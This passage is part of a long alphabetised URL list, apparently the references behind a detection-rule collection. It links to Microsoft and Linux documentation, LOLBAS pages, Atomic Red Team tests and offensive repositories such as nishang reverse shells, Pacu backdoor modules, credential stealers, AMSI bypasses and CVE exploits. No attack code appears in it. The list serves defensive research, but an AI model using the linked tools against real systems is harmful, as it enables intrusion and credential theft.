eam/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f33
9e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admi
n-privileges---macos\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\nhttps://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nhttps://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass\nhttps://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation\nhttps://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py\nhttps://github.com/Rhynorater/CVE-2018-15473-Exploit\nhttps://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38
e85cd3c83a17596175/NativeDump/Program.cs#L258\nhttps://github.com/RiccardoAncarani/LiquidSnake\nhttps://github.com/RiccardoAncarani/TaskShell/\nhttps://github.com/Ridter/cve-2020-0688\nhttps://github.com/rootm0s/WinPwnage\nhttps://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries\nhttps://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile\nhttps://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile\nhttps://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile\nhttps://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md\nhttps://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\nhttps://github.com/S12cybersecurity/RDPCredentialStealer\nhttps://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25\nhttps://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1\nhttps://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba\nhttps://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\nhttps://github.com/S3cur3Th1sSh1t/SharpImpersonation\nhttps://github.com/S3cur3Th1sSh1t/WinPwn\nhttps://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\nhttps://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35\nhttps://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt\nhttps://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\nhttps://github.com/samratashok/ADModule\nhttps://github.com/samratashok/nishang\nht
tps://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1\nhttps://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1\nhttps://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1\nhttps://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx\nhttps://github.com/search?q=CVE-2021-36934\nhttps://github.com/search?q=CVE-2021-43798\nhttps://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code\nhttps://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py\nhttps://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1\nhttps://github.com/sensepost/impersonate\nhttps://github.com/sensepost/reGeorg\nhttps://github.com/sensepost/ruler\nhttps://github.com/sensepost/ruler/issues/47\nhttps://github.com/shantanu561993/SharpChisel\nhttps://github.com/Shellntel/scripts/\nhttps://github.com/SigmaHQ/sigma/blob/ad1bfd3d28aa0ccc9656240f845022518ef65a2e/documentation/logsource-guides/windows/service/security.md\nhttps://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md\nhttps://github.com/SigmaHQ/sigma/issues/1009\nhttps://github.com/SigmaHQ/sigma/issues/253\nh
ttps://github.com/SigmaHQ/sigma/issues/3742\nhttps://github.com/SigmaHQ/sigma/pull/3946\nhttps://github.com/SigmaHQ/sigma/pull/4467\nhttps://github.com/SigmaHQ/sigma/pull/5724#issuecomment-3466382234\nhttps://github.com/skelsec/pypykatz\nhttps://github.com/sleventyeleven/linuxprivchecker/\nhttps://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py\nhttps://github.com/snovvcrash/DInjector\nhttps://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml\nhttps://github.com/splunk/security_content/blob/300af51b88ad5d5b27ce4f5f54e4d6e6a3a2c06d/detections/endpoint/office_spawning_control.yml\nhttps://github.com/splunk/security_content/blob/88d689fe8a055d8284337b9fad5d9152b42043db/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml\nhttps://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml\nhttps://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml\nhttps://github.com/sqlmapproject/sqlmap\nhttps://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427\nhttps://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt\nhttps://github.com/surya-dev-singh/AmsiBypass-OpenSession\nhttps://github.com/swagkarna/Defeat-Defender-V1.2.0\nhttps://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\nhttps://github.com/SwiftOnSecurity/sysmon-config/pull/92/files\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\nhttps://github.com/synacktiv
l/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nhttps://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nhttps://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services\nhttps://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services\nhttps://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script\nhttps://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic\nhttps://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/
windows-10/security/threat-protection/auditing/event-4649\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/wi
ndows-server-2012-r2-and-2012/cc731033(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)\nhttps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nhttps://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\nhttps://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16\nhttps://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/livekd\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/procdump\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/psexec\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/psservice\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sdelete\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected\nhttps://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected\nhttps://learn.microsoft.com/en-us/troubleshoot/develop
er/browsers/security-privacy/ie-security-zones-registry-entries\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled\nhttps://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password\nhttps://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\nhttps://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior\nhttps://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction\nhttps://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax\nhttps://learn.microsoft.com/en-us/windows-hardware/drivers/taef/\nhttps://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse\nhttps://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell\nhttps://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\nhttps://learn.microsoft.com/en-us/windows-server/adminis
tration/windows-commands/chcp\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup\nhttps://learn.microsoft.co
m/en-us/windows-server/administration/windows-commands/wbadmin-start-backup\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nhttps://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers\nhttps://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies\nhttps://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection\nhttps://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization\nhttps://learn.microsoft.com/en-us/windows/client-management/manage-recall\nhttps://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\nhttps://learn.microsoft.com/en-us/windows/msix/package/package-support-framework\nhttps://learn.microsoft.com/en-us/windows/msix/package/unsigned-package\nhttps://learn.microsoft.com/en-us/windows/package-manager/winget/source\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker\nhttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\nh
ttps://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations\nhttps://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations\nhttps://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations\nhttps://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all\nhttps://learn.microsoft.com/en-us/
windows/win32/amsi/how-amsi-helps\nhttps://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\nhttps://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver\nhttps://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\nhttps://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa\nhttps://learn.microsoft.com/en-us/windows/win32/api/winevt/\nhttps://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting\nhttps://learn.microsoft.com/en-us/windows/win32/cimwin32prov/delete-method-in-class-win32-service\nhttps://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key\nhttps://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\nhttps://learn.microsoft.com/en-us/windows/win32/msi/event-logging\nhttps://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\nhttps://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system\nhttps://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control\nhttps://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language\nhttps://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings\nhttps://learn.microsoft.com/en-us/windows/win32/shell/app-registration\nhttps://learn.microsoft.com/en-us/windows/win32/shell/csidl\nhttps://learn.microsoft.com/en-us/windows/win32/shell/launch\nhttps://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-\nhttps://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\nhttps://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture\nhttps://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista\nhttps://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp\nhttps://learn.microsoft.com/en-us/windows/wsl/install-on-ser
ver\nhttps://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings\nhttps://liberty-shell.com/sec/2020/02/25/shim-persistence/\nhttps://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/\nhttps://linux.die.net/man/1/arecord\nhttps://linux.die.net/man/1/bash\nhttps://linux.die.net/man/1/chage\nhttps://linux.die.net/man/1/dd\nhttps://linux.die.net/man/1/import\nhttps://linux.die.net/man/1/truncate\nhttps://linux.die.net/man/1/wget\nhttps://linux.die.net/man/1/xclip\nhttps://linux.die.net/man/1/xwd\nhttps://linux.die.net/man/8/groupdel\nhttps://linux.die.net/man/8/insmod\nhttps://linux.die.net/man/8/pam_tty_audit\nhttps://linux.die.net/man/8/useradd\nhttps://linux.die.net/man/8/userdel\nhttps://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa\nhttps://linuxhint.com/uninstall-debian-packages/\nhttps://linuxhint.com/uninstall_yum_package/\nhttps://linuxhint.com/view-tomcat-logs-windows/\nhttps://linuxize.com/post/how-to-delete-group-in-linux/\nhttps://lolbas-project.github.io\nhttps://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\nhttps://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/\nhttps://lolbas-project.github.io/lolbas/Binaries/Atbroker/\nhttps://lolbas-project.github.io/lolbas/Binaries/Bash/\nhttps://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\nhttps://lolbas-project.github.io/lolbas/Binaries/Certoc/\nhttps://lolbas-project.github.io/lolbas/Binaries/Certreq/\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\nhttps://lolbas-project.github.io/lolbas/Binaries/Cmdl32/\nhttps://lolbas-project.github.io/lolbas/Binaries/Cmstp/\nhttps://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/\nhttps://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/\nhttps://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/\nhttps://lolbas-project.github.io/lolbas/Binaries/Diantz/\nhttps://lolbas-project.github.io/lolbas/Binaries/Dnscmd/\nhttps://lol
bas-project.github.io/lolbas/Binaries/Eventvwr/#execute\nhttps://lolbas-project.github.io/lolbas/Binaries/Extexport/\nhttps://lolbas-project.github.io/lolbas/Binaries/Extrac32/\nhttps://lolbas-project.github.io/lolbas/Binaries/Findstr/\nhttps://lolbas-project.github.io/lolbas/Binaries/Forfiles/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ftp/\nhttps://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ieexec/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ilasm/\nhttps://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/\nhttps://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/\nhttps://lolbas-project.github.io/lolbas/Binaries/Jsc/\nhttps://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/\nhttps://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/\nhttps://lolbas-project.github.io/lolbas/Binaries/Msdt/\nhttps://lolbas-project.github.io/lolbas/Binaries/Msedge/\nhttps://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/\nhttps://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/\nhttps://lolbas-project.github.io/lolbas/Binaries/Msiexec/\nhttps://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\nhttps://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/\nhttps://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/\nhttps://lolbas-project.github.io/lolbas/Binaries/Pcalua/\nhttps://lolbas-project.github.io/lolbas/Binaries/Pcwrun/\nhttps://lolbas-proje